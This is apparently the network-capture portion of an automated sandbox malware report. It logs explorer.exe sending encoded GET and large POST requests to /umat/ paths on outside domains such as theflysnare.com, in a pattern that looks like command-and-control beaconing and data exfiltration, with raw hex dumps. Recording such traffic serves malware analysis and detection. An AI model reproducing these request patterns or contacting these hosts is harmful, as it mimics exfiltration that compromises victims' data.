XQ~T(NubNegk9srRhjcPVS4JTOe-HPpMA0pABKzkK-Y6vylX(GFvQWpJoSUmdMupC313vzt4(hHXuC1V5ruZPjQltdavrHhFMc3fR8Zn4M8gWiZ3po2SKlwMZTKe9eMuHGyrwkMhIvoRr5Ytz5mgXxxuLwTmPm~G6FhLzlHmOqF5YdNNi_Ld2gIseoHL1ZdQxvYNIc~hD7VBvzNpKRBibEbau3A4vLbouWpvCN9WDuSc4IL9yTUyQLzuxcZtLNmUZnypjr3BFIoPn2Iqn4Eefk8ywxwDysc90PkYOG7VyLOTOkgZi5P8pjC8AlhfZqrwVSd_suKgY0oQJ6XDbAfDJqHcoKAFBGQyq
                                                                                                          Jun 3, 2022 08:17:55.403441906 CEST11070OUTData Raw: 46 47 31 6c 42 54 6c 30 65 4a 41 46 52 66 79 6c 68 63 34 68 6e 63 31 5a 58 7a 4c 64 43 49 33 38 52 43 57 6b 32 6d 46 71 61 65 32 4f 55 64 56 74 7a 54 55 53 44 36 54 39 52 54 78 66 70 38 44 47 79 69 6f 4a 34 78 6a 74 72 38 32 5a 4c 6e 28 51 4e 54
                                                                                                          Data Ascii: FG1lBTl0eJAFRfylhc4hnc1ZXzLdCI38RCWk2mFqae2OUdVtzTUSD6T9RTxfp8DGyioJ4xjtr82ZLn(QNTVoMtCv(nibuaCODxNzGVOvDh8Ckkao4LYuPFCUAcmX0CRj74cWDiaysbYiW6~oxJppBrYmJDIsNrJZHiltm7(p0liLij5ZPdXMgFSazyullmwoubxYYsbfwTZcmeNSp7q8Ad2o~9L5H5A02JS1aKkqY-MBJ13H~KI
                                                                                                          Jun 3, 2022 08:17:55.403500080 CEST11078OUTData Raw: 4f 56 30 65 57 7a 63 4e 68 63 37 6b 4f 35 72 31 36 5a 6a 35 79 50 32 46 55 74 43 50 6b 45 77 34 28 75 47 74 4d 67 49 62 54 71 54 75 79 32 55 39 53 4e 51 5f 62 77 57 49 70 4b 70 62 7a 2d 35 37 54 50 6d 47 5a 76 43 6f 6b 4b 46 63 4b 57 65 4a 34 4f
                                                                                                          Data Ascii: OV0eWzcNhc7kO5r16Zj5yP2FUtCPkEw4(uGtMgIbTqTuy2U9SNQ_bwWIpKpbz-57TPmGZvCokKFcKWeJ4OBE6RhsYfTckX8mlRwSj-Te3mlCyyPFij(KDMyIwU(PiBeyPmzfLMVWO3q3aivfUDe11kcBk5k9nqIM(cbOT6KvqLPYc5Q9vUwvuVm00cKfNhmNKiiRGbvsf1Zmc7sEXGZx6jOFmN9fnYm9SNZI7GwGx4J1iQMh1cy
                                                                                                          Jun 3, 2022 08:17:55.581613064 CEST11085OUTData Raw: 64 6b 67 45 35 77 39 31 31 79 73 31 4b 56 63 35 68 64 6c 76 33 74 77 52 7a 72 74 51 4f 31 62 7a 43 6f 44 41 52 4b 71 44 35 76 4b 45 4e 74 4c 56 48 30 42 54 53 37 41 50 33 37 66 74 33 56 62 65 78 6d 6d 53 59 6f 78 56 66 63 50 2d 36 54 42 55 28 74
                                                                                                          Data Ascii: dkgE5w911ys1KVc5hdlv3twRzrtQO1bzCoDARKqD5vKENtLVH0BTS7AP37ft3VbexmmSYoxVfcP-6TBU(t7GpIgkYNcVHB4RP4R6mjNi6d6wMbjzkfvbqBOXREx9rV8n83XHvNy20PGRXOC8Uje1RFhgY0UfkHlJP4vj9qAAhr1bU2UZ2xrgTkpLGchQBZFw~L7pmczQXBE3snIai8G4HnvBmMSAU5XxUPm_(hkw9J0TGBPrE6X
                                                                                                          Jun 3, 2022 08:17:55.581774950 CEST11087OUTData Raw: 65 4d 63 71 6b 63 47 37 78 48 70 67 4d 37 6c 75 41 4d 63 61 47 4e 28 71 58 57 51 59 51 47 31 32 44 71 7a 47 6b 4c 6f 31 68 75 6f 54 6e 52 4b 78 28 72 4d 65 76 51 35 31 4c 43 52 5f 75 30 68 77 65 76 6d 57 66 76 4d 41 66 63 75 61 55 30 6b 76 63 33
                                                                                                          Data Ascii: eMcqkcG7xHpgM7luAMcaGN(qXWQYQG12DqzGkLo1huoTnRKx(rMevQ51LCR_u0hwevmWfvMAfcuaU0kvc3QrhKKc(mYfZ_zl5UC3bznBbNvPdgMgtoTh1w2k7v8kLrULFGtCmtRUZtzbydxVY6xzisZ8LsMvBU0kxrEeLNy9TAAGlscrOBb4UlZvtxTgAZHCDwpz0ALBGA7ODWnWdECUWz6-lhydMWzEoi0fLzXp6zCmXrSiI2K


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          13192.168.2.449837107.187.232.17380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:55.392704964 CEST11057OUTGET /umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.sarrafguler.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:17:55.561633110 CEST11079INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 785
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e c3 bc c9 bd ce c4 c4 b2 ca b5 d2 b5 cd b6 d7 ca d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                          Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          14192.168.2.44988823.227.38.7480C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:19:18.163798094 CEST11193OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.theflysnare.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.theflysnare.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.theflysnare.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 46 41 78 58 36 54 78 6d 54 37 69 55 6d 46 52 61 45 77 6e 69 34 53 54 66 38 57 51 76 37 6e 37 77 6d 75 7a 4b 67 49 5a 71 72 4b 52 74 46 69 43 32 43 58 47 30 73 6b 72 48 45 4a 66 57 34 59 45 54 4b 56 36 65 59 7a 38 70 70 55 46 56 74 2d 7a 34 69 4d 37 50 4d 63 63 66 62 67 76 34 6b 56 59 41 62 32 4b 4f 64 42 6e 5a 5a 33 38 65 4d 34 38 4c 28 57 78 66 62 70 70 30 41 63 36 55 63 59 28 54 47 78 6c 4f 7a 51 42 73 66 51 74 74 51 33 36 46 55 54 61 6b 73 61 53 59 79 72 7e 6f 73 76 45 64 51 70 76 4f 65 45 64 6e 36 30 32 59 6a 45 78 7a 57 72 43 57 47 5a 41 62 35 76 32 62 51 36 6f 71 38 6c 6f 55 58 58 72 74 35 31 6d 4b 71 6f 62 41 67 66 4c 48 61 30 45 5a 5a 4c 66 5a 54 63 4c 62 42 50 68 6d 56 64 4e 61 39 58 30 48 4a 76 35 73 66 74 69 34 64 70 71 4a 6c 39 53 49 50 59 58 41 51 69 71 35 50 30 65 56 4b 6b 61 49 39 66 41 6f 7a 48 52 61 6e 55 4d 65 35 56 6a 63 59 4a 48 70 42 35 58 79 36 4c 55 6b 5a 77 63 63 32 69 72 78 42 4d 4d 6d 4a 50 48 32 66 4f 77 57 48 55 44 45 73 66 47 6e 57 6f 52 32 6d 31 77 7a 58 78 48 36 44 43 4a 4b 70 4d 66 58 61 75 58 41 74 55 79 4e 54 35 52 52 57 5f 56 30 51 41 30 31 6e 73 68 71 43 70 68 54 50 5f 63 62 28 32 59 67 71 62 69 43 66 79 61 4c 49 65 37 46 38 57 53 37 52 50 45 6a 7a 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: bT7tPLpx=FAxX6TxmT7iUmFRaEwni4STf8WQv7n7wmuzKgIZqrKRtFiC2CXG0skrHEJfW4YETKV6eYz8ppUFVt-z4iM7PMccfbgv4kVYAb2KOdBnZZ38eM48L(Wxfbpp0Ac6UcY(TGxlOzQBsfQttQ36FUTaksaSYyr~osvEdQpvOeEdn602YjExzWrCWGZAb5v2bQ6oq8loUXXrt51mKqobAgfLHa0EZZLfZTcLbBPhmVdNa9X0HJv5sfti4dpqJl9SIPYXAQiq5P0eVKkaI9fAozHRanUMe5VjcYJHpB5Xy6LUkZwcc2irxBMMmJPH2fOwWHUDEsfGnWoR2m1wzXxH6DCJKpMfXauXAtUyNT5RRW_V0QA01nshqCphTP_cb(2YgqbiCfyaLIe7F8WS7RPEjzw).


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          15192.168.2.44988923.227.38.7480C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:19:18.184734106 CEST11206OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.theflysnare.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.theflysnare.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.theflysnare.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 46 41 78 58 36 52 6c 77 4f 61 28 51 6f 31 64 44 48 44 57 37 7a 43 44 64 7e 6d 55 6b 6e 32 47 75 78 4c 66 5f 28 64 6b 61 36 36 6f 71 54 47 6e 35 56 41 6a 70 73 6b 61 70 49 61 36 65 31 59 34 55 4b 56 6a 50 59 77 51 70 37 55 39 46 74 5a 57 6c 73 49 62 41 4d 38 63 7a 55 41 76 6c 67 51 35 51 62 32 50 70 64 42 76 4a 59 47 77 65 4e 62 45 4c 6f 6e 78 45 57 70 70 79 65 73 71 79 53 34 7a 4f 47 78 4e 57 7a 52 39 73 4b 77 78 74 52 57 4c 33 64 77 79 72 6c 71 53 5a 33 72 7e 36 6d 50 41 4a 51 70 37 67 65 46 68 6e 36 47 53 59 6c 58 35 7a 51 59 61 58 4e 4a 41 65 39 76 32 4b 48 4b 73 47 38 6c 45 54 58 56 48 62 34 48 36 4b 72 59 62 44 33 35 75 79 65 6a 52 52 62 4c 44 31 54 63 50 69 41 65 4d 7a 56 59 39 36 7e 6d 46 5f 56 64 52 47 66 6f 53 53 62 4a 71 4e 75 64 53 44 50 59 58 30 51 69 71 48 50 31 4f 56 4b 6c 53 49 38 38 34 6f 69 33 52 5a 73 45 4d 51 69 6c 69 65 54 70 4c 4c 42 35 28 49 36 4b 4d 53 59 44 34 63 77 79 62 78 48 72 34 6c 64 5f 48 4b 62 4f 78 4b 44 55 43 54 73 66 47 4a 57 72 4a 59 6d 6d 55 7a 52 6b 7a 36 42 58 56 4b 36 4d 66 58 56 4f 58 47 6e 30 7e 64 54 35 5a 64 57 39 64 4f 52 33 6b 31 6e 5a 74 71 47 34 68 54 50 50 63 62 30 57 5a 77 69 36 54 4c 55 69 37 58 47 2d 65 6b 32 52 37 77 64 76 64 53 76 55 56 50 4a 50 7a 69 76 42 28 34 41 6d 50 6c 69 4a 75 74 33 78 59 2d 31 76 33 52 6d 4a 59 79 69 36 49 4a 67 33 62 61 66 74 51 78 6e 4c 46 53 47 41 5a 48 39 42 61 6d 7e 6d 6e 36 48 52 4c 51 72 33 68 4f 39 75 71 4f 44 55 41 42 7a 58 34 64 33 39 76 4f 76 5f 78 69 6d 4f 61 79 6c 55 4d 30 73 34 4a 5f 36 67 7a 57 50 4b 70 55 62 31 71 64 31 30 7e 50 74 46 41 79 4d 79 71 61 4a 4b 74 79 30 4e 34 77 32 35 72 39 70 59 64 54 71 31 4c 49 79 75 7a 42 4f 31 77 56 58 4b 58 79 41 64 32 30 55 4f 39 66 59 39 6a 53 50 43 4d 33 44 32 33 37 61 30 6b 5a 6b 39 38 44 4b 76 67 4a 54 5a 65 43 68 6b 44 76 4e 61 44 39 34 46 7a 36 39 61 67 69 53 76 56 4c 34 36 7e 77 4f 44 6d 68 73 66 43 53 7a 66 73 79 71 49 45 37 5a 4c 31 6d 28 49 73 56 48 2d 6d 79 42 46 31 4f 35 43 6a 63 71 74 53 65 54 42 68 4d 7e 49 28 42 6b 47 39 64 6b 64 59 33 51 31 32 36 34 45 6b 57 4f 50 63 48 6b 70 70 54 65 6c 50 35 49 75 28 7a 4e 34 69 4a 54 43 52 4b 34 58 46 4c 66 68 45 64 4e 4a 4c 4c 6c 72 49 4f 31 54 4a 76 39 75 65 7a 56 68 70 46 44 49 48 6f 72 58 70 43 7a 57 28 38 4f 5a 4c 61 36 34 53 42 54 6c 50 5f 61 49 30 66 6f 63 75 41 53 51 6f 7a 6f 42 6b 6b 4c 53 7e 58 78 39 54 58 4d 37 51 4b 77 32 69 4c 37 38 72 59 78 39 45 32 77 73 6d 32 56 47 30 49 32 55 38 4c 67 4c 61 58 6b 62 30 5f 52 52 28 33 68 73 61 4f 4f 52 35 69 49 55 57 41 75 75 54 44 6e 61 7e 70 34 6b 78 6a 43 52 47 62 6b 42 33 48 41 45 41 7a 42 35 58 4a 28 4e 59 55 50 6a 4a 63 54 74 33 37 68 6f 7a 74 4a 46 6f 70 55 49 57 4b 67 52 37 63 72 42 75 62 53 36 67 46 76 49 55 48 63 71 56 7a 31 55 43 76 52 37 72 66 72 65 6e 33 52 59 4a 68 4f 47 36 74 51 75 41 6a 6f 72 77 30 30 71 7a 71 6f 6a 6a 6e 75 53 36 4d 4c 49 36 62 45 76 72 79 4c 32 36 66 36 67 6f 63 69 45 49 30 74 5f 63 65 4b 35 7a 32 6e 43 63 61 70 37 78 34 4f 4e 59 42 6a 5a 77 68 50 6a 45 61 6f 43 73 42 62 6f 6b 32 34 44 6e 46 4e 55 73 65 65 4d 4a 53 79 56 67 30 32 4a 4d 36 47 69 56 67 56 67 48 49 68 7a 67 64 31 72 4e 34 74 4e 73 51 51 5f 54 6b 36 41 52 68 55 52 6a 47 30 6a 44 32 6c 77 6e 51 54 4e 75 55 4d 72 4a 45 69 52 58 4f 33 57 51 50 32 57 28 2d 63 68 4d 53 61 32 46 56 74 45 51 45 7e 61 71 75 4a 6a 31 59 47 34 76 4d 76 6f 79 6c 42 41 73 73 6f 73 57 33 45 4e 44 78 4b 55 45 31 49 73 33 69 58 76 33 74 74 48 76 75 4e 6c 62 42 4f 65 73 53 44 49 41 75 78 4b 38 4a 69 39 65 4d 61 37 68 45 52 72 43 66 46 6d 44 63 36 79 62 66 42 70 41 76 63 6d 54 46 56 32 28 44 6c 33 32 45 73 4b 35 34 6e 6b 47 56 6c 4a 59 6c 54 49 73 51 35 46 33 61 42 66 70 75 48 50 69 6e 64 50 75 54 58 71 54 42 76 36 28 54 66 73 54 51 78 4f 46 59 44 7a 46 4b 73 7a 7e 33 6f 41 6c 57 78 55 63 34 78 4d 39 6e 70 41 42 30 56 64 28 77 68 32 4c 59 36 6c 56 48 70 70 78 63 47 35 59 56 36 53 28 7a 7a 6a 49 61 56 34 78 31 6d 42 4b 30 66 52 70 50 61 45 6d 4a 4c 67 4d 52 4b 42 48 48 6c 6e 6b 4e 46 5f 48 4a 59 46 51 41 56 77 77 54 44 6d 69 68 37 64 43 43 7e 66 66 71 65 4a 78 7a 75 2d 6e 43 57 6d 4d 72 42 54
                                                                                                          Data Ascii: bT7tPLpx=FAxX6RlwOa(Qo1dDHDW7zCDd~mUkn2GuxLf_(dka66oqTGn5VAjpskapIa6e1Y4UKVjPYwQp7U9FtZWlsIbAM8czUAvlgQ5Qb2PpdBvJYGweNbELonxEWppyesqyS4zOGxNWzR9sKwxtRWL3dwyrlqSZ3r~6mPAJQp7geFhn6GSYlX5zQYaXNJAe9v2KHKsG8lETXVHb4H6KrYbD35uyejRRbLD1TcPiAeMzVY96~mF_VdRGfoSSbJqNudSDPYX0QiqHP1OVKlSI884oi3RZsEMQilieTpLLB5(I6KMSYD4cwybxHr4ld_HKbOxKDUCTsfGJWrJYmmUzRkz6BXVK6MfXVOXGn0~dT5ZdW9dOR3k1nZtqG4hTPPcb0WZwi6TLUi7XG-ek2R7wdvdSvUVPJPzivB(4AmPliJut3xY-1v3RmJYyi6IJg3baftQxnLFSGAZH9Bam~mn6HRLQr3hO9uqODUABzX4d39vOv_ximOaylUM0s4J_6gzWPKpUb1qd10~PtFAyMyqaJKty0N4w25r9pYdTq1LIyuzBO1wVXKXyAd20UO9fY9jSPCM3D237a0kZk98DKvgJTZeChkDvNaD94Fz69agiSvVL46~wODmhsfCSzfsyqIE7ZL1m(IsVH-myBF1O5CjcqtSeTBhM~I(BkG9dkdY3Q1264EkWOPcHkppTelP5Iu(zN4iJTCRK4XFLfhEdNJLLlrIO1TJv9uezVhpFDIHorXpCzW(8OZLa64SBTlP_aI0focuASQozoBkkLS~Xx9TXM7QKw2iL78rYx9E2wsm2VG0I2U8LgLaXkb0_RR(3hsaOOR5iIUWAuuTDna~p4kxjCRGbkB3HAEAzB5XJ(NYUPjJcTt37hoztJFopUIWKgR7crBubS6gFvIUHcqVz1UCvR7rfren3RYJhOG6tQuAjorw00qzqojjnuS6MLI6bEvryL26f6gociEI0t_ceK5z2nCcap7x4ONYBjZwhPjEaoCsBbok24DnFNUseeMJSyVg02JM6GiVgVgHIhzgd1rN4tNsQQ_Tk6ARhURjG0jD2lwnQTNuUMrJEiRXO3WQP2W(-chMSa2FVtEQE~aquJj1YG4vMvoylBAssosW3ENDxKUE1Is3iXv3ttHvuNlbBOesSDIAuxK8Ji9eMa7hERrCfFmDc6ybfBpAvcmTFV2(Dl32EsK54nkGVlJYlTIsQ5F3aBfpuHPindPuTXqTBv6(TfsTQxOFYDzFKsz~3oAlWxUc4xM9npAB0Vd(wh2LY6lVHppxcG5YV6S(zzjIaV4x1mBK0fRpPaEmJLgMRKBHHlnkNF_HJYFQAVwwTDmih7dCC~ffqeJxzu-nCWmMrBTt54ssYIHE764IjRVpQrqzS6_FItJ~Q87JoRAQQbig0rXCqHo~ODdcMmkjXR6IfUx1My4v43_zIOCRZzYwB7OaSkUQPBPvZArmp9MJxGozQIgp8ZNktm1b30ZXFGi9wXpkyWK6ghLYS9tYmAwgPOsC88LBRKrjuyA~XVteqjykEgzcm2ydv1mrNhfbJ~jVJ7DZKHOhUEWrrSdnnzRoBWFdHBKzYGb3e10o6s4F5mK2LqrgsNG(lfy4CZS7c1cOCXzpPTf05WjKz(YcocATvy3mHeMInCeH44BIDZdLldzAgW2IRdZ~NxMBMBFeteTHeUmHl8npg1Bbgo8hOK0btoXfM6xF7mqQm(IIzjpunNDRjaFk9RiALvJ5GVrUsD2Z3cu09cDvOE6au4PeucTizVL72QP~wkoqdWzEGCjES8SQKqvDsXEZ4747zzFvpm_QaShFL49VO~CTMjeBijVU5A1guWPD7s4ecryi-6b0c140ALXfqBkXoxyye4hdKsTNywhBGOBKyqURYg-3mQgVZ1mPtj_BKE6~0BhnPQMASvpCsUowwASj0V0Z0hQrWlLA6wAUEUQ9f~0DsRUen6LhC31GrZ5pFsJSVkbX59XMJiSfgtbgDBOFNekAzw0pKtRTmveYmeRmtJxLUEKdbAs6x7wwGuB3zTInP9DhwHYndTOk2t5HdWwzmlFQfYsYpotLBA_cBevKeEERVtNYFtpmR6Av056EmJp~k0EYL7H2UKYENibbNq1Z6kBkYRK3Fzpm7AfGHWl74M3cPfnZUft0K5-eZJjB0F-jDHHRnJAH8fI0nwrfa4G8JiPo_X5SzMn~Ah0vnwKcWXALyt5pZrfd25gqrR3MIl8Z3MFXINMzleWgkHizWDfFAUOgxxE2rmPPys7Ke2n3ncwNLGhEAi43MCCGkXW(3MYlibkhy5OOBwVq4~jD7dQ0w7JeSMmF4G-Y_z66Sza4v~FAUVAd4ctiLs2dzgQrXnSRD9aF9~L5rn1(3sP96KQuhGB5_Pgw-zAB7MA1y86aGd4bao_DoWTp3B3DjaRCGllc4X4p9d9zBpLBpBe7oY8aoxGIMiu3DV2qMYvWktMYOSCzLZrJ3ZgZAhnQNgG5MW6ovUjzsUWbz6PY-TLUdo9qQyh9wpVHWjdat8Fuu68Htp6~aQ5oBJ_xXDLpsd2Th6H2rnFDg(4cdVEnBDxEqDB~G5458VGHC5XjKpBbESNHNGeaijJDMhB9ZeRfQeAfJx9nlOL7uhg3ZDlZCEHzQQXNfTzrgIDwEDr253RWPxQCgrexcYwRaIY8K33Oh(RAUFi2aMXgBvPxNtMzyeLQQ2cD8tyjnOsPm4UeG0og9Glu8gd2IB_062J~FL1qrzeMBLs35~-hS5B5q9Ms6Gy~hgsknTd6zsoT-HhXiKAzDbAF1Z72I5Th1XETMuJEmiecltbDazpmlYWwxyRVivO~VJ7hRi-MWcBEc3Ve5uoIuh6bKzM~WMcTLLWkU9t9pX9E_ykoPv4yrfRkivZwx5ox9Iz4YmCoKTp0Li_aJyzQEasJr4Rd92VZ_auojQb174MbGHCQQRsO6D_zRFf7wvbRv2E9crHT1dr7Y~4xQF3d5nfgdG0otq7Cxo5t6IurKQ-7zuoXdt6NaOq2FYIDM7fYIlNAsYZpCPyr_NjLV7Q2-wZ5ytn4Qtg0-2C~rtEPMx5cJgcL-vbGZxtFannQR7GrFzOO73bPo9jN6gUVtD7caacPn2UVFyqgIagnn9Y7b7Dsywj~aH5dzulp5rb94UgO2wCU0lO~9kQIzNVRxrDVmLMVviT1DtF~vJKlBaVg8M8hR(lvKtH6VtxtZvMyIzDfwx89LcY9jViIFiDj36sXFIeWhz2L9yJUmeMUEsLJzzWoZ7E6IBzgnrYYkhLEIQvS6JYbJHA9bvKoIsV2IzxPojAOjAamiNx8yF8Sq1KD0VMiu3V2yJ16HrTT7zFMVcOiDd61-SD~luzxsO56pc0E_YUeTCcUNvCcwVFboBZDxTEr0Qa7ZnjgpIanvZR5ADi4_AAZCIJCoIUhVXZGSK_qBBq1skSCmFkR0Cr2bEhG5V2itQKwIsLfE9n(Y2-mPgWpIgjQ_PlgkIFYS2bxniUXf~5PCil1tq6L2UNT-aOSWTsOHqeFEbvUqB8vUmNFemdFRHocpfZ0CaIroPU9v5Q2dOjQ2SLgzYWoOd6k7qPAzTyiPdlyOBLCnNdVp4uO5lfc4~iu18pl17duaUYAjlZqq3RvDou8fjsnGzloVR_yDzPB_nmlh3vQ8iMnSnr3Lu3xQ3pBFyRashh62edHdrITb8cIoctemtVveU3MXT-~zI5XmM4Fl7b8KQ7U7B4eVXjLGSWCGt1tT0KkAj76L~e2RYstEcv08QUp8pkpAzvl867yCPfwhNFqQIPqOzTrCnURy9EDgh8nenEZtZLWaaIF8jcPrZX2XQM0DoF6HCvmujseNEmzEX2zGXPPs85iI0wSSZstmbZ2H7Ba3ZTVcDVUh1YxJop48ssvZxkYlS4c5zo~j9rwiHT762v54eXtbFtsejHNPeEp1(bgrmBXtUQRpYqFCxe~SFl68Nxax38xzrES3wasaN1WXpPuXnuEObU9kQ0KqnqDodm8nRc7gYMwU450H4SLSGwrLuGLDdxUEjTtostXYfT8be8zuPk4c9mYtQfEAZAmUe3u0Zu53LuDo3Ge17HUlQuMheQ(cMzN1kkZKIei6XwAFJ
                                                                                                          Jun 3, 2022 08:19:18.201390028 CEST11223OUTData Raw: 58 61 6d 4e 42 58 45 47 59 4e 77 6b 76 6a 76 64 4c 35 6c 35 71 76 75 35 66 55 65 5f 4c 4c 46 39 45 62 77 67 4e 79 63 32 6b 69 6b 34 34 67 7e 6d 31 64 34 61 47 61 45 64 45 4e 34 47 43 44 43 43 41 51 6f 47 73 67 31 44 74 65 67 51 78 39 6d 5a 44 6d
                                                                                                          Data Ascii: XamNBXEGYNwkvjvdL5l5qvu5fUe_LLF9EbwgNyc2kik44g~m1d4aGaEdEN4GCDCCAQoGsg1DtegQx9mZDm644FiZcw(ftNqMPjy2Ssoa(hwTWt(0ExYN(FF0pdEvO_BwxHDWsC0P2rqW3NB1Rj5-6n3EkTxbW9UBDvIM4cWfuV~meA~brrt3Bk6C0Ij_QMqn6ubDo4TXA3ByFDC0ThSRsq0L~_LS0OOdQ-SAfzYss6N9jS(EmdX
                                                                                                          Jun 3, 2022 08:19:18.201456070 CEST11230OUTData Raw: 4b 43 31 6b 49 34 6a 65 35 30 4e 77 61 68 39 58 69 69 73 53 4e 5a 6b 57 33 57 39 46 31 6f 63 47 36 2d 63 30 49 68 72 34 65 6b 67 31 54 39 59 2d 75 2d 6b 46 56 5f 71 4e 4b 4a 53 79 4f 36 4a 64 62 73 4d 51 45 30 4b 5a 54 7a 34 54 4e 5f 30 4c 37 71
                                                                                                          Data Ascii: KC1kI4je50Nwah9XiisSNZkW3W9F1ocG6-c0Ihr4ekg1T9Y-u-kFV_qNKJSyO6JdbsMQE0KZTz4TN_0L7q174y~ff7l_acyZydSnN8TRfDZ7odMugp1W3pnzX9ipRI~-EkYXDknVamYQhAdYTGHQlkXvJ9BvZaze5wciktBVCIlKW4rE9VZEfiPrS0SvKufyOB9A~hCsXO32jMdUoAxkN15Xn9X9tP6_ym507ztRhl1lUb7OzGf
                                                                                                          Jun 3, 2022 08:19:18.581618071 CEST11239INHTTP/1.1 402 Payment Required
